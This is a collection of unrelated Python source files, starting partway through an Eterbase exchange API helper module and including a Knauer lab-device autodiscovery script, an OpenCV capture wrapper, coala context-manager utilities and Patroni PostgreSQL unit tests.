global shared_client
if shared_client is None:
shared_client = aiohttp.ClientSession()
return shared_client
async def api_request(http_method: str,
path_url: str = None,
url: str = None,
data: Optional[Dict[str, Any]] = None,
auth: Optional[EterbaseAuth] = None,
loop: Optional = None) -> Dict[str, Any]:
"""
A wrapper for submitting API requests to Eterbase
:returns: json data from the endpoints
"""
assert path_url is not None or url is not None
url = f"{constants.REST_URL}{path_url}" if url is None else url
data_str = None
if data is not None:
data_str = json.dumps(data)
_eu_logger.debug(f"Request: url: {url}")
_eu_logger.debug(f"Request: data: {data_str}")
headers = {}
if auth is not None:
headers = auth.get_headers(http_method, url, data_str)
if data is not None:
headers['Content-Type'] = "application/json"
client = await _http_client(loop)
async with client.request(http_method,
url=url,
timeout=API_CALL_TIMEOUT,
data=data_str,
headers=headers) as response:
data = None
data = await response.text()
_eu_logger.debug(f"Response text data: '{data}'."[:400])
if len(data) > 0:
try:
data = json.loads(data)
except ValueError:
_eu_logger.info(f"Response is not a json text: '{data}'."[:400])
if (response.status != 200) and (response.status != 204):
raise IOError(f"Error fetching data from {url}. HTTP status is {response.status}. {data}", response.status)
return data
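# Illustrative usage sketch (not part of the original connector): fetching the public
# /markets endpoint through api_request from inside a coroutine. The coroutine below is
# hypothetical and is never scheduled here.
async def _example_list_markets():
    markets = await api_request("get", path_url="/markets")
    return [market.get("symbol") for market in markets]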
def start_background_loop(loop: asyncio.AbstractEventLoop) -> None:
loop.run_forever()
def get_marketid_mapping() -> Dict[int, str]:
global marketid_map
if (marketid_map is None):
loop = asyncio.new_event_loop()
t = Thread(target=start_background_loop, args=(loop, ), daemon=True)
t.start()
future = asyncio.run_coroutine_threadsafe(api_request("get", path_url="/markets", loop=loop), loop)
markets = future.result(constants.API_TIMEOUT_SEC)
loop.stop()
marketid_map = dict()
for market in markets:
marketid = market.get("id")
if marketid not in marketid_map.keys():
trad_pair = market.get("symbol")
marketid_map[marketid] = trad_pair
return marketid_map
trading_pairs_split = None
def prepare_trading_pairs_split(markets: List):
global trading_pairs_split
if trading_pairs_split is None:
trading_pairs_split = dict()
for market in markets:
trad_pair = market.get("symbol")
if trad_pair not in trading_pairs_split:
base = market.get("base")
quote = market.get("quote")
trading_pairs_split[trad_pair] = {"base": base, "quote": quote}
def split_trading_pair(trading_pair: str) -> Tuple[str, str]:
global trading_pairs_split
if (trading_pairs_split is None):
loop = asyncio.new_event_loop()
t = Thread(target=start_background_loop, args=(loop, ), daemon=True)
t.start()
future = asyncio.run_coroutine_threadsafe(api_request("get", path_url="/markets", loop=loop), loop)
markets = future.result(constants.API_TIMEOUT_SEC)
loop.stop()
prepare_trading_pairs_split(markets)
try:
market = trading_pairs_split[trading_pair]
base_asset = market['base']
quote_asset = market['quote']
return base_asset, quote_asset
except Exception:
raise ValueError(f"Error parsing trading_pair {trading_pair}", exc_info=True)
def convert_to_exchange_trading_pair(hb_trading_pair: str) -> str:
return hb_trading_pair.replace("-", "")
def convert_from_exchange_trading_pair(trading_pair: str) -> str:
base, quote = split_trading_pair(trading_pair)
return f"{base}-{quote}"
KEYS = {
"eterbase_api_key":
ConfigVar(key="eterbase_api_key",
prompt="Enter your Eterbase API key >>> ",
required_if=using_exchange("eterbase"),
is_secure=True,
is_connect_key=True),
"eterbase_secret_key":
ConfigVar(key="eterbase_secret_key",
prompt="Enter your Eterbase secret key >>> ",
required_if=using_exchange("eterbase"),
is_secure=True,
is_connect_key=True),
"eterbase_account":
ConfigVar(key="eterbase_account",
prompt="Enter your Eterbase account >>> ",
required_if=using_exchange("eterbase"),
is_secure=True,
is_connect_key=True),
}
|
Knauer_autodiscover.py
|
""" Autodiscover Knauer devices on network """
import asyncio
import queue
import socket
import sys
import time
from threading import Thread
from typing import Dict, Text, Tuple, Union
from getmac import getmac
from loguru import logger
Address = Tuple[str, int]
class BroadcastProtocol(asyncio.DatagramProtocol):
"""From https://gist.github.com/yluthu/4f785d4546057b49b56c"""
def __init__(self, target: Address, response_queue: queue.Queue):
self.target = target
self.loop = asyncio.get_event_loop()
self._queue = response_queue
def connection_made(self, transport: asyncio.transports.DatagramTransport): # type: ignore
"""Called upon connection."""
sock = transport.get_extra_info("socket") # type: socket.socket
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) # sets to broadcast
transport.sendto(b"\x00\x01\x00\xf6", self.target)
def datagram_received(self, data: Union[bytes, Text], addr: Address):
"""Called on data received"""
logger.trace(f"Received data from {addr}")
self._queue.put(addr[0])
async def get_device_type(ip_address: str) -> str:
"""Returns either 'Pump', 'Valve' or 'Unknown'"""
fut = asyncio.open_connection(host=ip_address, port=10001)
try:
reader, writer = await asyncio.wait_for(fut, timeout=3)
except ConnectionError:
return "ConnectionError"
except asyncio.TimeoutError:
if ip_address == "192.168.1.2":
return "TimeoutError - Nice FlowIR that you have :D"
return "TimeoutError"
# Test Pump
writer.write("HEADTYPE:?\n\r".encode())
reply = await reader.readuntil(separator=b"\r")
if reply.startswith(b"HEADTYPE"):
logger.debug(f"Device {ip_address} is a Pump")
return "Pump"
# Test Valve
writer.write("T:?\n\r".encode())
reply = await reader.readuntil(separator=b"\r")
if reply.startswith(b"VALVE"):
logger.debug(f"Device {ip_address} is a Valve")
return "Valve"
return "Unknown"
def autodiscover_knauer(source_ip: str = "") -> Dict[str, str]:
"""
Automatically find Knauer ethernet device on the network and returns the IP associated to each MAC address.
Note that the MAC is the key here as it is the parameter used in configuration files.
Knauer devices only support DHCP so static IPs are not an option.
Args:
source_ip: source IP for autodiscover (only relevant if multiple network interfaces are available!)
Returns:
        Dictionary mapping MAC address to IP address, one entry per device replying to autodiscover
"""
# Define source IP resolving local hostname.
if not source_ip:
hostname = socket.gethostname()
source_ip = socket.gethostbyname(hostname)
loop = asyncio.get_event_loop()
device_q: queue.Queue = queue.Queue()
coro = loop.create_datagram_endpoint(
lambda: BroadcastProtocol(("255.255.255.255", 30718), response_queue=device_q),
local_addr=(source_ip, 28688),
)
loop.run_until_complete(coro)
thread = Thread(target=loop.run_forever)
thread.start()
time.sleep(2)
    loop.call_soon_threadsafe(loop.stop)  # stop the broadcast loop after the 2 s listening window
thread.join()
device_list = []
for _ in range(40):
try:
device_list.append(device_q.get_nowait())
except queue.Empty:
break
device_info = dict()
for device_ip in device_list:
# MAC address
mac = getmac.get_mac_address(ip=device_ip)
device_info[mac] = device_ip
return device_info
if __name__ == "__main__":
# This is a bug of asyncio on Windows :|
if sys.platform == "win32":
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
# Autodiscover devices (dict mac as index, IP as value)
devices = autodiscover_knauer()
for mac_address, ip in devices.items():
# Device Type
device_type = asyncio.run(get_device_type(ip))
print(f"MAC: {mac_address} IP: {ip} DEVICE_TYPE: {device_type}")
|
videocv.py
|
#!/usr/bin/env python2
import time
import cv2
from threading import Thread
class Videocv():
"""
Ensures constant frame rates for the CV2 video input.
"""
def __init__(self, src=0, fps=30):
self.fps = float(fps)
self._vc = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self._vc.read()
self.ended = False
def run(self):
Thread(target=self.get, args=()).start()
return
    def get(self):
        while not self.ended:
            time.sleep(1 / self.fps)
            if not self.grabbed:
                self.stop()
            else:
                (self.grabbed, self.frame) = self._vc.read()
        self._vc.release()  # free the capture device once the loop ends
def stop(self):
self.ended = True
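# A minimal usage sketch (assuming a default webcam at index 0 and a local
# display); this block is illustrative and not part of the original module.
if __name__ == "__main__":
    video = Videocv(src=0, fps=30)
    video.run()  # start the background capture thread
    try:
        while not video.ended:
            if video.frame is not None:
                cv2.imshow("frame", video.frame)
            # quit on 'q'
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
    finally:
        video.stop()
        cv2.destroyAllWindows()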
|
ContextManagers.py
|
import builtins
import os
import platform
import signal
import sys
import threading
from contextlib import closing, contextmanager
from io import StringIO
from coala_utils.MutableValue import MutableValue
from coala_utils.FileUtils import create_tempfile
@contextmanager
def subprocess_timeout(sub_process, seconds, kill_pg=False):
"""
Kill subprocess if the sub process takes more the than the timeout.
:param sub_process: The sub process to run.
:param seconds: The number of seconds to allow the test to run for. If
set to 0 or a negative value, it waits indefinitely.
Floats can be used to specify units smaller than
seconds.
:param kill_pg: Boolean whether to kill the process group or only this
process. (not applicable for windows)
"""
timedout = MutableValue(False)
if seconds <= 0:
yield timedout
return
finished = threading.Event()
if platform.system() == "Windows": # pragma: no cover
kill_pg = False
def kill_it():
finished.wait(seconds)
if not finished.is_set():
timedout.value = True
if kill_pg:
pgid = os.getpgid(sub_process.pid)
os.kill(sub_process.pid, signal.SIGINT)
if kill_pg:
os.killpg(pgid, signal.SIGINT)
thread = threading.Thread(name='timeout-killer', target=kill_it)
try:
thread.start()
yield timedout
finally:
finished.set()
thread.join()
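def _subprocess_timeout_example():
    """
    Hedged usage sketch (not part of the original API): waits on a process for
    at most 5 seconds and reports whether it was killed by the timeout.
    """
    import subprocess
    proc = subprocess.Popen([sys.executable, '-c', 'import time; time.sleep(60)'])
    with subprocess_timeout(proc, 5) as timedout:
        proc.wait()
    return timedout.value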
@contextmanager
def replace_stdout(replacement):
"""
Replaces stdout with the replacement, yields back to the caller and then
reverts everything back.
"""
_stdout = sys.stdout
sys.stdout = replacement
try:
yield
finally:
sys.stdout = _stdout
@contextmanager
def replace_stderr(replacement):
"""
Replaces stderr with the replacement, yields back to the caller and then
reverts everything back.
"""
_stderr = sys.stderr
sys.stderr = replacement
try:
yield
finally:
sys.stderr = _stderr
@contextmanager
def suppress_stdout():
"""
Suppresses everything going to stdout.
"""
with open(os.devnull, "w") as devnull, replace_stdout(devnull):
yield
@contextmanager
def retrieve_stdout():
"""
Yields a StringIO object from which one can read everything that was
printed to stdout. (It won't be printed to the real stdout!)
Example usage:
with retrieve_stdout() as stdout:
print("something") # Won't print to the console
what_was_printed = stdout.getvalue() # Save the value
"""
with closing(StringIO()) as sio, replace_stdout(sio):
oldprint = builtins.print
try:
            # Overriding sys.stdout alone doesn't affect code that has already
            # cached the print builtin, so the builtin itself is replaced too.
def newprint(*args, **kwargs):
kwargs['file'] = sio
oldprint(*args, **kwargs)
builtins.print = newprint
yield sio
finally:
builtins.print = oldprint
@contextmanager
def retrieve_stderr():
"""
Yields a StringIO object from which one can read everything that was
printed to stderr. (It won't be printed to the real stderr!)
Example usage:
with retrieve_stderr() as stderr:
print("something") # Won't print to the console
what_was_printed = stderr.getvalue() # Save the value
"""
with closing(StringIO()) as sio, replace_stderr(sio):
oldprint = builtins.print
try:
            # Overriding sys.stderr alone doesn't affect code that has already
            # cached the print builtin, so the builtin itself is replaced too.
def newprint(*args, **kwargs):
kwargs['file'] = sio
oldprint(*args, **kwargs)
builtins.print = newprint
yield sio
finally:
builtins.print = oldprint
@contextmanager
def simulate_console_inputs(*inputs):
"""
Does some magic to simulate the given inputs to any calls to the ``input``
builtin. This yields back an InputGenerator object so you can check
which input was already used and append any additional inputs you want.
Example:
with simulate_console_inputs(0, 1, 2) as generator:
assert(input() == 0)
assert(generator.last_input == 0)
generator.inputs.append(3)
assert(input() == 1)
assert(input() == 2)
assert(input() == 3)
assert(generator.last_input == 3)
:param inputs: Any inputs to simulate.
:raises ValueError: Raised when was asked for more input but there's no
more provided.
"""
class InputGenerator:
def __init__(self, inputs):
self.last_input = -1
self.inputs = inputs
def generate_input(self, prompt=''):
print(prompt, end="")
self.last_input += 1
try:
return self.inputs[self.last_input]
except IndexError:
raise ValueError("Asked for more input, but no more was "
"provided from `simulate_console_inputs`.")
input_generator = InputGenerator(list(inputs))
_input = builtins.input
builtins.input = input_generator.generate_input
try:
yield input_generator
finally:
builtins.input = _input
@contextmanager
def make_temp(suffix="", prefix="tmp", dir=None):
"""
Creates a temporary file with a closed stream and deletes it when done.
:return: A contextmanager retrieving the file path.
"""
tempfile = create_tempfile(suffix=suffix, prefix=prefix, dir=dir)
try:
yield tempfile
finally:
os.remove(tempfile)
@contextmanager
def prepare_file(lines,
filename,
force_linebreaks=True,
create_tempfile=True,
tempfile_kwargs={}):
"""
Can create a temporary file (if filename is None) with the lines.
Can also add a trailing newline to each line specified if needed.
:param lines: The lines from the file. (list or tuple of strings)
:param filename: The filename to be prepared.
:param force_linebreaks: Whether to append newlines at each line if needed.
:param create_tempfile: Whether to save lines in tempfile if needed.
:param tempfile_kwargs: Kwargs passed to tempfile.mkstemp().
"""
if force_linebreaks:
lines = type(lines)(line if line.endswith('\n') else line + '\n'
for line in lines)
if not create_tempfile and filename is None:
filename = "dummy_file_name"
if not isinstance(filename, str) and create_tempfile:
with make_temp(**tempfile_kwargs) as filename:
with open(filename, 'w', encoding='utf-8') as file:
file.writelines(lines)
yield lines, filename
else:
yield lines, filename
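def _prepare_file_example():
    """
    Hedged usage sketch (not part of the original API): prepares two lines in a
    temporary file and returns its contents ("a\\nb\\n").
    """
    with prepare_file(['a', 'b'], filename=None) as (lines, fname):
        with open(fname, encoding='utf-8') as file:
            return file.read()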
@contextmanager
def change_directory(path):
old_dir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(old_dir)
@contextmanager
def open_files(*args):
    """
    Handle opening and closing for multiple files at once.
    :param args: Tuples with the format ``(filename, mode)``.
    """
    files = []
    try:
        for (file, mode) in args:
            files.append(open(file, mode))
        yield tuple(files)
    finally:
        # Close whatever was successfully opened, even if the caller raised.
        for file in files:
            file.close()
|
test_postgresql.py
|
import mock # for the mock.call method, importing it without a namespace breaks python3
import os
import psycopg2
import subprocess
import time
from mock import Mock, MagicMock, PropertyMock, patch, mock_open
from patroni.async_executor import CriticalTask
from patroni.dcs import Cluster, ClusterConfig, Member, RemoteMember, SyncState
from patroni.exceptions import PostgresConnectionException
from patroni.postgresql import Postgresql, STATE_REJECT, STATE_NO_RESPONSE
from patroni.postgresql.postmaster import PostmasterProcess
from patroni.postgresql.slots import SlotsHandler
from patroni.utils import RetryFailedError
from six.moves import builtins
from threading import Thread, current_thread
from . import BaseTestPostgresql, MockCursor, MockPostmaster, psycopg2_connect
mtime_ret = {}
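# mock_mtime returns the current time on the first call for a filename and a
# value incremented by one second on each subsequent call, so code under test
# sees the file as modified between checks.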
def mock_mtime(filename):
if filename not in mtime_ret:
mtime_ret[filename] = time.time()
else:
mtime_ret[filename] += 1
return mtime_ret[filename]
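# Canned pg_controldata output used to exercise controldata()/sysid parsing below.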
def pg_controldata_string(*args, **kwargs):
return b"""
pg_control version number: 942
Catalog version number: 201509161
Database system identifier: 6200971513092291716
Database cluster state: shut down in recovery
pg_control last modified: Fri Oct 2 10:57:06 2015
Latest checkpoint location: 0/30000C8
Prior checkpoint location: 0/2000060
Latest checkpoint's REDO location: 0/3000090
Latest checkpoint's REDO WAL file: 000000020000000000000003
Latest checkpoint's TimeLineID: 2
Latest checkpoint's PrevTimeLineID: 2
Latest checkpoint's full_page_writes: on
Latest checkpoint's NextXID: 0/943
Latest checkpoint's NextOID: 24576
Latest checkpoint's NextMultiXactId: 1
Latest checkpoint's NextMultiOffset: 0
Latest checkpoint's oldestXID: 931
Latest checkpoint's oldestXID's DB: 1
Latest checkpoint's oldestActiveXID: 943
Latest checkpoint's oldestMultiXid: 1
Latest checkpoint's oldestMulti's DB: 1
Latest checkpoint's oldestCommitTs: 0
Latest checkpoint's newestCommitTs: 0
Time of latest checkpoint: Fri Oct 2 10:56:54 2015
Fake LSN counter for unlogged rels: 0/1
Minimum recovery ending location: 0/30241F8
Min recovery ending loc's timeline: 2
Backup start location: 0/0
Backup end location: 0/0
End-of-backup record required: no
wal_level setting: hot_standby
Current wal_log_hints setting: on
Current max_connections setting: 100
Current max_worker_processes setting: 8
Current max_prepared_xacts setting: 0
Current max_locks_per_xact setting: 64
Current track_commit_timestamp setting: off
Maximum data alignment: 8
Database block size: 8192
Blocks per segment of large relation: 131072
WAL block size: 8192
Bytes per WAL segment: 16777216
Maximum length of identifiers: 64
Maximum columns in an index: 32
Maximum size of a TOAST chunk: 1996
Size of a large-object chunk: 2048
Date/time type storage: 64-bit integers
Float4 argument passing: by value
Float8 argument passing: by value
Data page checksum version: 0
"""
@patch('subprocess.call', Mock(return_value=0))
@patch('psycopg2.connect', psycopg2_connect)
class TestPostgresql(BaseTestPostgresql):
@patch('subprocess.call', Mock(return_value=0))
@patch('os.rename', Mock())
@patch('patroni.postgresql.CallbackExecutor', Mock())
@patch.object(Postgresql, 'get_major_version', Mock(return_value=120000))
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def setUp(self):
super(TestPostgresql, self).setUp()
self.p.config.write_postgresql_conf()
self.p._callback_executor = Mock()
@patch('subprocess.Popen')
@patch.object(Postgresql, 'wait_for_startup')
@patch.object(Postgresql, 'wait_for_port_open')
@patch.object(Postgresql, 'is_running')
@patch.object(Postgresql, 'controldata', Mock())
def test_start(self, mock_is_running, mock_wait_for_port_open, mock_wait_for_startup, mock_popen):
mock_is_running.return_value = MockPostmaster()
mock_wait_for_port_open.return_value = True
mock_wait_for_startup.return_value = False
mock_popen.return_value.stdout.readline.return_value = '123'
self.assertTrue(self.p.start())
mock_is_running.return_value = None
mock_postmaster = MockPostmaster()
with patch.object(PostmasterProcess, 'start', return_value=mock_postmaster):
pg_conf = os.path.join(self.p.data_dir, 'postgresql.conf')
open(pg_conf, 'w').close()
self.assertFalse(self.p.start(task=CriticalTask()))
with open(pg_conf) as f:
lines = f.readlines()
self.assertTrue("f.oo = 'bar'\n" in lines)
mock_wait_for_startup.return_value = None
self.assertFalse(self.p.start(10))
self.assertIsNone(self.p.start())
mock_wait_for_port_open.return_value = False
self.assertFalse(self.p.start())
task = CriticalTask()
task.cancel()
self.assertFalse(self.p.start(task=task))
self.p.cancellable.cancel()
self.assertFalse(self.p.start())
@patch.object(Postgresql, 'pg_isready')
@patch('patroni.postgresql.polling_loop', Mock(return_value=range(1)))
def test_wait_for_port_open(self, mock_pg_isready):
mock_pg_isready.return_value = STATE_NO_RESPONSE
mock_postmaster = MockPostmaster(is_running=False)
# No pid file and postmaster death
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
mock_postmaster.is_running.return_value = True
# timeout
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
# pg_isready failure
mock_pg_isready.return_value = 'garbage'
self.assertTrue(self.p.wait_for_port_open(mock_postmaster, 1))
# cancelled
self.p.cancellable.cancel()
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
@patch('time.sleep', Mock())
@patch.object(Postgresql, 'is_running')
@patch.object(Postgresql, '_wait_for_connection_close', Mock())
def test_stop(self, mock_is_running):
# Postmaster is not running
mock_callback = Mock()
mock_is_running.return_value = None
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
# Is running, stopped successfully
mock_is_running.return_value = mock_postmaster = MockPostmaster()
mock_callback.reset_mock()
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
mock_postmaster.signal_stop.assert_called()
# Stop signal failed
mock_postmaster.signal_stop.return_value = False
self.assertFalse(self.p.stop())
# Stop signal failed to find process
mock_postmaster.signal_stop.return_value = True
mock_callback.reset_mock()
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
def test_restart(self):
self.p.start = Mock(return_value=False)
self.assertFalse(self.p.restart())
self.assertEqual(self.p.state, 'restart failed (restarting)')
@patch('os.chmod', Mock())
@patch.object(builtins, 'open', MagicMock())
def test_write_pgpass(self):
self.p.config.write_pgpass({'host': 'localhost', 'port': '5432', 'user': 'foo'})
self.p.config.write_pgpass({'host': 'localhost', 'port': '5432', 'user': 'foo', 'password': 'bar'})
def test_checkpoint(self):
with patch.object(MockCursor, 'fetchone', Mock(return_value=(True, ))):
self.assertEqual(self.p.checkpoint({'user': 'postgres'}), 'is_in_recovery=true')
with patch.object(MockCursor, 'execute', Mock(return_value=None)):
self.assertIsNone(self.p.checkpoint())
self.assertEqual(self.p.checkpoint(), 'not accessible or not healty')
@patch('patroni.postgresql.config.mtime', mock_mtime)
@patch('patroni.postgresql.config.ConfigHandler._get_pg_settings')
def test_check_recovery_conf(self, mock_get_pg_settings):
mock_get_pg_settings.return_value = {
'primary_conninfo': ['primary_conninfo', 'foo=', None, 'string', 'postmaster'],
'recovery_min_apply_delay': ['recovery_min_apply_delay', '0', 'ms', 'integer', 'sighup']
}
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
self.p.config.write_recovery_conf({'standby_mode': 'on'})
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
mock_get_pg_settings.return_value['primary_conninfo'][1] = ''
mock_get_pg_settings.return_value['recovery_min_apply_delay'][1] = '1'
self.assertEqual(self.p.config.check_recovery_conf(None), (True, False))
mock_get_pg_settings.return_value['recovery_min_apply_delay'][1] = '0'
self.assertEqual(self.p.config.check_recovery_conf(None), (False, False))
conninfo = {'host': '1', 'password': 'bar'}
with patch('patroni.postgresql.config.ConfigHandler.primary_conninfo_params', Mock(return_value=conninfo)):
mock_get_pg_settings.return_value['recovery_min_apply_delay'][1] = '1'
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
mock_get_pg_settings.return_value['primary_conninfo'][1] = 'host=1 passfile=' + self.p.config._pgpass
mock_get_pg_settings.return_value['recovery_min_apply_delay'][1] = '0'
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
self.p.config.write_recovery_conf({'standby_mode': 'on', 'primary_conninfo': conninfo.copy()})
self.p.config.write_postgresql_conf()
self.assertEqual(self.p.config.check_recovery_conf(None), (False, False))
@patch.object(Postgresql, 'major_version', PropertyMock(return_value=120000))
@patch.object(Postgresql, 'is_running', MockPostmaster)
@patch.object(MockPostmaster, 'create_time', Mock(return_value=1234567), create=True)
@patch('patroni.postgresql.config.ConfigHandler._get_pg_settings')
def test__read_recovery_params(self, mock_get_pg_settings):
mock_get_pg_settings.return_value = {'primary_conninfo': ['primary_conninfo', '', None, 'string', 'postmaster']}
self.p.config.write_recovery_conf({'standby_mode': 'on', 'primary_conninfo': {'password': 'foo'}})
self.p.config.write_postgresql_conf()
self.assertEqual(self.p.config.check_recovery_conf(None), (False, False))
self.assertEqual(self.p.config.check_recovery_conf(None), (False, False))
mock_get_pg_settings.side_effect = Exception
with patch('patroni.postgresql.config.mtime', mock_mtime):
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
@patch.object(Postgresql, 'major_version', PropertyMock(return_value=100000))
def test__read_recovery_params_pre_v12(self):
self.p.config.write_recovery_conf({'standby_mode': 'on', 'primary_conninfo': {'password': 'foo'}})
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
self.p.config.write_recovery_conf({'standby_mode': '\n'})
with patch('patroni.postgresql.config.mtime', mock_mtime):
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
def test_write_postgresql_and_sanitize_auto_conf(self):
read_data = 'primary_conninfo = foo\nfoo = bar\n'
with open(os.path.join(self.p.data_dir, 'postgresql.auto.conf'), 'w') as f:
f.write(read_data)
mock_read_auto = mock_open(read_data=read_data)
mock_read_auto.return_value.__iter__ = lambda o: iter(o.readline, '')
with patch.object(builtins, 'open', Mock(side_effect=[mock_open()(), mock_read_auto(), IOError])),\
patch('os.chmod', Mock()):
self.p.config.write_postgresql_conf()
with patch.object(builtins, 'open', Mock(side_effect=[mock_open()(), IOError])), patch('os.chmod', Mock()):
self.p.config.write_postgresql_conf()
self.p.config.write_recovery_conf({'foo': 'bar'})
self.p.config.write_postgresql_conf()
@patch.object(Postgresql, 'is_running', Mock(return_value=False))
@patch.object(Postgresql, 'start', Mock())
def test_follow(self):
self.p.call_nowait('on_start')
m = RemoteMember('1', {'restore_command': '2', 'primary_slot_name': 'foo', 'conn_kwargs': {'host': 'bar'}})
self.p.follow(m)
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def test_sync_replication_slots(self):
self.p.start()
config = ClusterConfig(1, {'slots': {'ls': {'database': 'a', 'plugin': 'b'},
'A': 0, 'test_3': 0, 'b': {'type': 'logical', 'plugin': '1'}}}, 1)
cluster = Cluster(True, config, self.leader, 0, [self.me, self.other, self.leadermem], None, None, None)
with mock.patch('patroni.postgresql.Postgresql._query', Mock(side_effect=psycopg2.OperationalError)):
self.p.slots_handler.sync_replication_slots(cluster)
self.p.slots_handler.sync_replication_slots(cluster)
with mock.patch('patroni.postgresql.Postgresql.role', new_callable=PropertyMock(return_value='replica')):
self.p.slots_handler.sync_replication_slots(cluster)
with patch.object(SlotsHandler, 'drop_replication_slot', Mock(return_value=True)),\
patch('patroni.dcs.logger.error', new_callable=Mock()) as errorlog_mock:
alias1 = Member(0, 'test-3', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5436/postgres'})
alias2 = Member(0, 'test.3', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5436/postgres'})
cluster.members.extend([alias1, alias2])
self.p.slots_handler.sync_replication_slots(cluster)
self.assertEqual(errorlog_mock.call_count, 5)
ca = errorlog_mock.call_args_list[0][0][1]
self.assertTrue("test-3" in ca, "non matching {0}".format(ca))
self.assertTrue("test.3" in ca, "non matching {0}".format(ca))
@patch.object(MockCursor, 'execute', Mock(side_effect=psycopg2.OperationalError))
def test__query(self):
self.assertRaises(PostgresConnectionException, self.p._query, 'blabla')
self.p._state = 'restarting'
self.assertRaises(RetryFailedError, self.p._query, 'blabla')
def test_query(self):
self.p.query('select 1')
self.assertRaises(PostgresConnectionException, self.p.query, 'RetryFailedError')
self.assertRaises(psycopg2.ProgrammingError, self.p.query, 'blabla')
@patch.object(Postgresql, 'pg_isready', Mock(return_value=STATE_REJECT))
def test_is_leader(self):
self.assertTrue(self.p.is_leader())
self.p.reset_cluster_info_state()
with patch.object(Postgresql, '_query', Mock(side_effect=RetryFailedError(''))):
self.assertRaises(PostgresConnectionException, self.p.is_leader)
def test_reload(self):
self.assertTrue(self.p.reload())
@patch.object(Postgresql, 'is_running')
def test_is_healthy(self, mock_is_running):
mock_is_running.return_value = True
self.assertTrue(self.p.is_healthy())
mock_is_running.return_value = False
self.assertFalse(self.p.is_healthy())
def test_promote(self):
self.p.set_role('replica')
self.assertIsNone(self.p.promote(0))
self.assertTrue(self.p.promote(0))
def test_timeline_wal_position(self):
self.assertEqual(self.p.timeline_wal_position(), (1, 2))
Thread(target=self.p.timeline_wal_position).start()
@patch.object(PostmasterProcess, 'from_pidfile')
def test_is_running(self, mock_frompidfile):
# Cached postmaster running
mock_postmaster = self.p._postmaster_proc = MockPostmaster()
self.assertEqual(self.p.is_running(), mock_postmaster)
# Cached postmaster not running, no postmaster running
mock_postmaster.is_running.return_value = False
mock_frompidfile.return_value = None
self.assertEqual(self.p.is_running(), None)
self.assertEqual(self.p._postmaster_proc, None)
# No cached postmaster, postmaster running
mock_frompidfile.return_value = mock_postmaster2 = MockPostmaster()
self.assertEqual(self.p.is_running(), mock_postmaster2)
self.assertEqual(self.p._postmaster_proc, mock_postmaster2)
@patch('shlex.split', Mock(side_effect=OSError))
def test_call_nowait(self):
self.p.set_role('replica')
self.assertIsNone(self.p.call_nowait('on_start'))
self.p.bootstrapping = True
self.assertIsNone(self.p.call_nowait('on_start'))
def test_non_existing_callback(self):
self.assertFalse(self.p.call_nowait('foobar'))
@patch.object(Postgresql, 'is_running', Mock(return_value=MockPostmaster()))
def test_is_leader_exception(self):
self.p.start()
self.p.query = Mock(side_effect=psycopg2.OperationalError("not supported"))
self.assertTrue(self.p.stop())
@patch('os.rename', Mock())
@patch('os.path.isdir', Mock(return_value=True))
def test_move_data_directory(self):
self.p.move_data_directory()
with patch('os.rename', Mock(side_effect=OSError)):
self.p.move_data_directory()
@patch('os.listdir', Mock(return_value=['recovery.conf']))
@patch('os.path.exists', Mock(return_value=True))
@patch.object(Postgresql, 'controldata', Mock())
def test_get_postgres_role_from_data_directory(self):
self.assertEqual(self.p.get_postgres_role_from_data_directory(), 'replica')
def test_remove_data_directory(self):
def _symlink(src, dst):
try:
os.symlink(src, dst)
except OSError:
                if os.name == 'nt':  # os.symlink under Windows needs admin rights, so skip it
pass
os.makedirs(os.path.join(self.p.data_dir, 'foo'))
_symlink('foo', os.path.join(self.p.data_dir, 'pg_wal'))
self.p.remove_data_directory()
open(self.p.data_dir, 'w').close()
self.p.remove_data_directory()
_symlink('unexisting', self.p.data_dir)
with patch('os.unlink', Mock(side_effect=OSError)):
self.p.remove_data_directory()
self.p.remove_data_directory()
@patch('patroni.postgresql.Postgresql._version_file_exists', Mock(return_value=True))
def test_controldata(self):
with patch('subprocess.check_output', Mock(return_value=0, side_effect=pg_controldata_string)):
data = self.p.controldata()
self.assertEqual(len(data), 50)
self.assertEqual(data['Database cluster state'], 'shut down in recovery')
self.assertEqual(data['wal_log_hints setting'], 'on')
self.assertEqual(int(data['Database block size']), 8192)
with patch('subprocess.check_output', Mock(side_effect=subprocess.CalledProcessError(1, ''))):
self.assertEqual(self.p.controldata(), {})
@patch('patroni.postgresql.Postgresql._version_file_exists', Mock(return_value=True))
@patch('subprocess.check_output', MagicMock(return_value=0, side_effect=pg_controldata_string))
def test_sysid(self):
self.assertEqual(self.p.sysid, "6200971513092291716")
@patch('os.path.isfile', Mock(return_value=True))
@patch('shutil.copy', Mock(side_effect=IOError))
def test_save_configuration_files(self):
self.p.config.save_configuration_files()
@patch('os.path.isfile', Mock(side_effect=[False, True]))
@patch('shutil.copy', Mock(side_effect=IOError))
def test_restore_configuration_files(self):
self.p.config.restore_configuration_files()
def test_can_create_replica_without_replication_connection(self):
self.p.config._config['create_replica_method'] = []
self.assertFalse(self.p.can_create_replica_without_replication_connection())
self.p.config._config['create_replica_method'] = ['wale', 'basebackup']
self.p.config._config['wale'] = {'command': 'foo', 'no_master': 1}
self.assertTrue(self.p.can_create_replica_without_replication_connection())
